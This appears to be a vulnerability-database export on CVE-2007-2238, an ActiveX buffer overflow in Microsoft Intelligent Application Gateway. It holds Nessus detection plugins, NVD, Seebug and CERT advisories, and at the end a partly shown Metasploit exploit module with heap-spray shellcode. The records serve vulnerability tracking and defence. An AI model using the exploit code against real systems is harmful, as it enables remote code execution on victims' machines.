script_cve_id(\"CVE-2007-2238\");\n script_bugtraq_id(34532);\n script_xref(name:\"CERT\", value:\"789121\");\n script_xref(name:\"Secunia\", value:\"34725\");\n\n script_name(english:\"Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows\");\n script_summary(english:\"Checks version of control\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by\nmultiple buffer overflows.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the Whale Client Components ActiveX control, a component\nof Microsoft Whale Intelligent Application Gateway product and installed\non the remote Windows host, reportedly 
contains multiple stack-based\nbuffer overflows that can be triggered using long arguments to the\n'CheckForUpdates' and 'UpdateComponents' methods. If an attacker can\ntrick a user on the affected host into viewing a specially crafted HTML\ndocument, he can leverage these issues to execute arbitrary code on the\naffected system subject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/library/dd282918.aspx\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Microsoft Intelligent Application Gateway 3.7 SP2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) 
exit(0);\n\n\n# Locate the file used by the controls.\nif (activex_init() != ACX_OK) exit(0);\n\nclsid = '{8D9563A9-8D5F-459B-87F2-BA842255CB9A}';\nfile = activex_get_filename(clsid:clsid);\nif (file)\n{\n version = activex_get_fileversion(clsid:clsid);\n\n if (version && activex_check_fileversion(clsid:clsid, fix:\"3.7\") == TRUE)\n {\n report = NULL;\n if (report_paranoia > 1)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Note, though, that Nessus did not check whether the kill bit was\\n\",\n \"set for the control's CLSID because of the Report Paranoia setting\\n\",\n \"in effect when this scan was run.\\n\"\n );\n else if (activex_get_killbit(clsid:clsid) == 0)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Moreover, its kill bit is not set so it is accessible via Internet\\n\",\n \"Explorer.\\n\"\n );\n if (report)\n {\n if (report_verbosity > 0) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n }\n }\n}\nactivex_end();\n", "title": "Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows", "type": "nessus", "viewCount": 43}, "differentElements": ["cvss", "description", "reporter", "modified", "href"], "edition": 6, "lastseen": "2019-02-21T01:11:53"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2007-2238"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The version of the Whale Client Components ActiveX control, a component of Microsoft Whale Intelligent Application Gateway product and installed on the remote Windows host, reportedly contains multiple stack-based buffer overflows that can be triggered using long arguments to the 'CheckForUpdates' and 'UpdateComponents' 
methods. If an attacker can trick a user on the affected host into viewing a specially crafted HTML document, he can leverage these issues to execute arbitrary code on the affected system subject to the user's privileges.", "edition": 2, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "hash": "5734d4552f61eccc66f393ab61a6db437c80b8e8090c5a6b5d9ef129c717d56a", "hashmap": [{"hash": "44a0c05534101e7e4ec146f0b881b8c9", "key": "description"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "46d2f7c8cafd8aab29cadb7d894022e3", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "06d31ea75ce174bd6e8a2331e24a21c2", "key": "modified"}, {"hash": "c07e25d141000fd1f654a48a4da4334f", "key": "published"}, {"hash": "d4c25866b8b36bc41e646cbb2f4efdd3", "key": "pluginID"}, {"hash": "7c1f8bce53687c065402b4e712a43db5", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "62035ad14892310feb62a59b29171a8e", "key": "references"}, {"hash": "b653856ccee7386f956205a29a7ed534", "key": "cvelist"}, {"hash": "a7fc0f0e1eb40af998b9f33578ab979c", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=38734", "id": "WHALE_CLIENT_ACTIVEX_3_7_SP2_OVERFLOWS.NASL", "lastseen": "2018-08-10T17:13:33", "modified": "2018-08-06T00:00:00", "naslFamily": "Windows", "objectVersion": "1.3", "pluginID": "38734", "published": "2009-05-11T00:00:00", "references": ["http://technet.microsoft.com/en-us/library/dd282918.aspx"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38734);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n 
script_cve_id(\"CVE-2007-2238\");\n script_bugtraq_id(34532);\n script_xref(name:\"CERT\", value:\"789121\");\n script_xref(name:\"Secunia\", value:\"34725\");\n\n script_name(english:\"Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows\");\n script_summary(english:\"Checks version of control\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by\nmultiple buffer overflows.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the Whale Client Components ActiveX control, a component\nof Microsoft Whale Intelligent Application Gateway product and installed\non the remote Windows host, reportedly contains multiple stack-based\nbuffer overflows that can be triggered using long arguments to the\n'CheckForUpdates' and 'UpdateComponents' methods. If an attacker can\ntrick a user on the affected host into viewing a specially crafted HTML\ndocument, he can leverage these issues to execute arbitrary code on the\naffected system subject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/library/dd282918.aspx\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Microsoft Intelligent Application Gateway 3.7 SP2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 
script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\n\n# Locate the file used by the controls.\nif (activex_init() != ACX_OK) exit(0);\n\nclsid = '{8D9563A9-8D5F-459B-87F2-BA842255CB9A}';\nfile = activex_get_filename(clsid:clsid);\nif (file)\n{\n version = activex_get_fileversion(clsid:clsid);\n\n if (version && activex_check_fileversion(clsid:clsid, fix:\"3.7\") == TRUE)\n {\n report = NULL;\n if (report_paranoia > 1)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Note, though, that Nessus did not check whether the kill bit was\\n\",\n \"set for the control's CLSID because of the Report Paranoia setting\\n\",\n \"in effect when this scan was run.\\n\"\n );\n else if (activex_get_killbit(clsid:clsid) == 0)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Moreover, its kill bit is not set so it is accessible via Internet\\n\",\n \"Explorer.\\n\"\n );\n if (report)\n {\n if (report_verbosity > 0) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n }\n }\n}\nactivex_end();\n", "title": 
"Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows", "type": "nessus", "viewCount": 28}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-10T17:13:33"}], "edition": 8, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvelist", "hash": "b653856ccee7386f956205a29a7ed534"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "description", "hash": "7a6f822b42e02a0c9da785674dc81360"}, {"key": "href", "hash": "6d284b5ee9a2896b99ca4ed3478bd4d1"}, {"key": "modified", "hash": "abcf9266f425f12dda38f529cd4a94bc"}, {"key": "naslFamily", "hash": "aea23489ce3aa9b6406ebb28e0cda430"}, {"key": "pluginID", "hash": "d4c25866b8b36bc41e646cbb2f4efdd3"}, {"key": "published", "hash": "c07e25d141000fd1f654a48a4da4334f"}, {"key": "references", "hash": "62035ad14892310feb62a59b29171a8e"}, {"key": "reporter", "hash": "d4cd6666f171eea3a0b59e991e7695df"}, {"key": "sourceData", "hash": "46d2f7c8cafd8aab29cadb7d894022e3"}, {"key": "title", "hash": "7c1f8bce53687c065402b4e712a43db5"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "7c5064430f58f59871cf9d488120f405a1bec7b3ffd15b25fda87ed87ab7bcd7", "viewCount": 43, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2238"]}, {"type": "seebug", "idList": ["SSV:5062", "SSV:5070"]}, {"type": "cert", "idList": ["VU:789121"]}, {"type": "exploitdb", "idList": ["EDB-ID:16608"]}, {"type": "d2", "idList": ["D2SEC_MSIAG"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82980"]}, {"type": "kaspersky", "idList": ["KLA10392"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MSWHALE_CHECKFORUPDATES"]}], "modified": "2019-11-03T12:38:43"}, "score": {"value": 7.6, "vector": "NONE", "modified": "2019-11-03T12:38:43"}, "vulnersScore": 7.6}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, 
Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38734);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\"CVE-2007-2238\");\n script_bugtraq_id(34532);\n script_xref(name:\"CERT\", value:\"789121\");\n script_xref(name:\"Secunia\", value:\"34725\");\n\n script_name(english:\"Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows\");\n script_summary(english:\"Checks version of control\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by\nmultiple buffer overflows.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the Whale Client Components ActiveX control, a component\nof Microsoft Whale Intelligent Application Gateway product and installed\non the remote Windows host, reportedly contains multiple stack-based\nbuffer overflows that can be triggered using long arguments to the\n'CheckForUpdates' and 'UpdateComponents' methods. 
If an attacker can\ntrick a user on the affected host into viewing a specially crafted HTML\ndocument, he can leverage these issues to execute arbitrary code on the\naffected system subject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/library/dd282918.aspx\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Microsoft Intelligent Application Gateway 3.7 SP2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\n\n# Locate the file used by the controls.\nif (activex_init() != ACX_OK) exit(0);\n\nclsid = '{8D9563A9-8D5F-459B-87F2-BA842255CB9A}';\nfile = 
activex_get_filename(clsid:clsid);\nif (file)\n{\n version = activex_get_fileversion(clsid:clsid);\n\n if (version && activex_check_fileversion(clsid:clsid, fix:\"3.7\") == TRUE)\n {\n report = NULL;\n if (report_paranoia > 1)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Note, though, that Nessus did not check whether the kill bit was\\n\",\n \"set for the control's CLSID because of the Report Paranoia setting\\n\",\n \"in effect when this scan was run.\\n\"\n );\n else if (activex_get_killbit(clsid:clsid) == 0)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Moreover, its kill bit is not set so it is accessible via Internet\\n\",\n \"Explorer.\\n\"\n );\n if (report)\n {\n if (report_verbosity > 0) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n }\n }\n}\nactivex_end();\n", "naslFamily": "Windows", "pluginID": "38734", "cpe": [], "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:08:59", "bulletinFamily": "NVD", "description": "Multiple stack-based buffer overflows in the Whale Client Components ActiveX control (WhlMgr.dll), as used in Microsoft Intelligent Application Gateway (IAG) before 3.7 SP2, allow remote attackers to execute arbitrary code via long arguments to the (1) CheckForUpdates or (2) UpdateComponents methods.", "modified": "2017-07-29T01:31:00", "id": "CVE-2007-2238", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2238", "published": "2009-04-16T15:12:00", "title": "CVE-2007-2238", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T18:53:29", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 34532\r\nCVE(CAN) ID: CVE-2007-2238\r\n\r\nMicrosoft\u7684Intelligent Application Gateway\uff08IAG\uff092007\u662f\u5168\u9762\u7684\u8fdc\u7a0b\u8bbf\u95ee\u7f51\u5173\uff0c\u63d0\u4f9b\u57fa\u4e8eSSL\u7684\u5e94\u7528\u7a0b\u5e8f\u8bbf\u95ee\u3001\u4fdd\u62a4\u548c\u7aef\u70b9\u5b89\u5168\u7ba1\u7406\u3002\r\n\r\nIAG\u6240\u4f7f\u7528\u7684Whale\u5ba2\u6237\u7aef\u7ec4\u4ef6\uff08\u7531WhlMgr.dll\u6587\u4ef6\u63d0\u4f9b\uff09\u6ca1\u6709\u6b63\u786e\u5730\u9a8c\u8bc1\u5bf9CheckForUpdates()\u548c UpdateComponents()\u65b9\u5f0f\u6240\u4f20\u9001\u7684\u8f93\u5165\u53c2\u6570\u3002\u5982\u679c\u7528\u6237\u53d7\u9a97\u8bbf\u95ee\u4e86\u6076\u610f\u7f51\u9875\u5e76\u5411\u4e0a\u8ff0\u65b9\u5f0f\u63d0\u4f9b\u4e86\u8d85\u957f\u8f93\u5165\u53c2\u6570\u7684\u8bdd\uff0c\u5c31\u53ef\u4ee5\u89e6\u53d1\u6808\u6ea2\u51fa\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n\nMicrosoft Intelligent Application Gateway 2007 3.7\n \u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u5728IE\u4e2d\u7981\u7528Whale\u5ba2\u6237\u7aef\u7ec4\u4ef6ActiveX\u63a7\u4ef6\uff0c\u4e3a\u4ee5\u4e0bCLSID\u8bbe\u7f6ekill 
bit\uff1a\r\n\r\n{8D9563A9-8D5F-459B-87F2-BA842255CB9A}\r\n\r\n\u6216\u5c06\u4ee5\u4e0b\u6587\u672c\u4fdd\u5b58\u4e3a.REG\u6587\u4ef6\u5e76\u5bfc\u5165\uff1a\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{8D9563A9-8D5F-459B-87F2-BA842255CB9A}]\r\n"Compatibility Flags"=dword:00000400\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=http://technet.microsoft.com/en-us/library/dd282918(printer).aspx target=_blank rel=external nofollow>http://technet.microsoft.com/en-us/library/dd282918(printer).aspx</a>", "modified": "2009-04-16T00:00:00", "published": "2009-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-5062", "id": "SSV:5062", "title": "Microsoft IAG 2007 ActiveX\u63a7\u4ef6\u6808\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T18:52:44", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 34532\r\nCVE ID\uff1aCVE-2007-2238\r\nCNCVE ID\uff1aCNCVE-20072238\r\n\r\nMicrosoft Intelligent Application Gateway\u662f\u4e00\u6b3e\u667a\u80fd\u5e94\u7528\u7a0b\u5e8f\u7f51\u5173\uff0c\u63d0\u4f9bSSL VPN\u529f\u80fd\u3002\r\nMicrosoft Whale Intelligent Application Gateway 
Whale\u5ba2\u6237\u7aef\u7ec4\u4ef6ActiveX\u63a7\u4ef6\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u4ee5\u5e94\u7528\u7a0b\u5e8f\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\nWhlMgr.dll\u6587\u4ef6\u63d0\u4f9b\u7684\u63a7\u4ef6\u5904\u7406CheckForUpdates()\u548cUpdateComponents()\u65b9\u6cd5\u5b58\u5728\u6808\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u6784\u5efa\u6076\u610fWEB\u9875\uff0c\u8bf1\u4f7f\u7528\u6237\u8bbf\u95ee\uff0c\u53ef\u5bfc\u81f4\u4ee5\u5e94\u7528\u7a0b\u5e8f\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\n\nMicrosoft Intelligent Application Gateway 2007 3.7\n \u53ef\u4e0b\u8f7d\u4f7f\u7528\u5982\u4e0b\u5b89\u5168\u8865\u4e01\uff1a\r\nMicrosoft Intelligent Application Gateway 2007 3.7\r\nMicrosoft Microsoft Whale Communications Intelligent Application Gateway 2007 Service Pack 2\r\n<a href=http://www.microsoft.com/downloads/details.aspx?FamilyID=e69dfd1d-d333 target=_blank rel=external nofollow>http://www.microsoft.com/downloads/details.aspx?FamilyID=e69dfd1d-d333</a> -4c27-9246-279ada224317&displaylang=en", "modified": "2009-04-21T00:00:00", "published": "2009-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-5070", "id": "SSV:5070", "title": "Microsoft IAG 2007 ActiveX\u63a7\u4ef6\u6808\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "cert": [{"lastseen": "2019-10-09T19:50:24", "bulletinFamily": "info", "description": "### Overview \n\nThe Microsoft Whale Intelligent Application Gateway Whale Client Components ActiveX control contains multiple stack buffer overflows, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nWhale Communications Intelligent Application Gateway is an application that provides SSL VPN functionality. 
The Whale Client Components, which is provided by the file `WhlMgr.dll`, contains stack buffer overflow vulnerabilities in the `CheckForUpdates()` and `UpdateComponents()` methods. Note that Whale Communications is a subsidiary of Microsoft. \n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code with the privileges of the user. The attacker could also cause the web browser to crash. \n \n--- \n \n### Solution \n\n**Apply an update**\n\nThis issue is addressed in Service Pack 1 for both Whale Communications Intelligent Application Gateway (IAG) 3.6 and Microsoft Intelligent Application Gateway 2007. \n \n--- \n \n \n**Disable the Whale Client Components ActiveX control in Internet Explorer** \n \nThe vulnerable ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID: \n \n`{8D9563A9-8D5F-459B-87F2-BA842255CB9A}` \nMore information about how to set the kill bit is available in [Microsoft Support Document 240797](<http://support.microsoft.com/kb/240797>). Alternatively, the following text can be saved as a `.REG` file and imported to set the kill bit for this control: \n \n`Windows Registry Editor Version 5.00` \n \n`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{8D9563A9-8D5F-459B-87F2-BA842255CB9A}]` \n`\"Compatibility Flags\"=dword:00000400` \nPlease note that setting the kill bit will break the Intelligent Application Gateway functionality. \n \n**Disable ActiveX** \n \nDisabling ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this and other ActiveX vulnerabilities. Instructions for disabling ActiveX in the Internet Zone can be found in the \"[Securing Your Web Browser](<http://www.cert.org/tech_tips/securing_browser/#Internet_Explorer>)\" document. 
\n \n--- \n \n### Vendor Information\n\n789121\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Microsoft Corporation\n\nNotified: December 14, 2006 Updated: May 27, 2009 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThis issue is addressed in Service Pack 1 for both Whale Communications Intelligent Application Gateway (IAG) 3.6 and Microsoft Intelligent Application Gateway 2007.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23789121 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://technet.microsoft.com/en-us/library/dd282918.aspx>\n * <http://support.microsoft.com/kb/240797>\n\n### Acknowledgements\n\nThis vulnerability was reported by Will Dormann of CERT/CC.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-2238](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2238>) \n---|--- \n**Severity Metric:****** | 3.41 \n**Date Public:** | 2009-04-15 \n**Date First Published:** | 2009-04-15 \n**Date Last Updated: ** | 2009-05-27 18:12 UTC \n**Document Revision: ** | 16 \n", "modified": "2009-05-27T18:12:00", "published": "2009-04-15T00:00:00", "id": "VU:789121", "href": "https://www.kb.cert.org/vuls/id/789121", "type": "cert", "title": "Microsoft Whale Intelligent Application Gateway Whale Client Components ActiveX control stack buffer 
overflows", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:11:38", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/82980/Microsoft-Whale-Intelligent-Application-Gateway-ActiveX-Control-Buffer-Overflow.html", "id": "PACKETSTORM:82980", "type": "packetstorm", "title": "Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow", "sourceData": "`### \n## This file is part of the Metasploit Framework and may be subject to \n## redistribution and commercial restrictions. Please see the Metasploit \n## Framework web site for more information on licensing and terms of use. \n## http://metasploit.com/framework/ \n### \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Microsoft Whale Intelligent Application \nGateway Whale Client. When sending an overly long string to CheckForUpdates() \nmethod of WhlMgr.dll (3.1.502.64) an attacker may be able to execute \narbitrary code. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'MC' ], \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2007-2238' ], \n[ 'OSVDB', '53933'], \n[ 'URL', 'http://technet.microsoft.com/en-us/library/dd282918.aspx' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] \n], \n'DisclosureDate' => 'Apr 15 2009', \n'DefaultTarget' => 0)) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n# Re-generate the payload. \nreturn if ((p = regenerate_payload(cli)) == nil) \n \n# fluff.. \nfluff = rand_text_english(rand(20) + 1) \n \n# Encode the shellcode. \nshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) \n \n# Set the return. \nret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"or cl,[edx]\").encode_string * 2) \n \njs = %Q| \ntry { \nvar evil_string = \"\"; \nvar index; \nvar vulnerable = new ActiveXObject('ComponentManager.Installer.1'); \nvar my_unescape = unescape; \nvar shellcode = '#{shellcode}'; \n#{js_heap_spray} \nsprayHeap(my_unescape(shellcode), 0x0a0a0a0a, 0x40000); \nfor (index = 0; index < 15000; index++) { \nevil_string = evil_string + my_unescape('#{ret}'); \n} \nvulnerable.CheckForUpdates(evil_string,'#{fluff}'); \n} catch( e ) { window.location = 'about:blank' ; } \n| \n \nopts = { \n'Strings' => true, \n'Symbols' => { \n'Variables' => [ \n'vulnerable', \n'shellcode', \n'my_unescape', \n'index', \n'evil_string', \n] \n} \n} \njs = ::Rex::Exploitation::ObfuscateJS.new(js, opts) 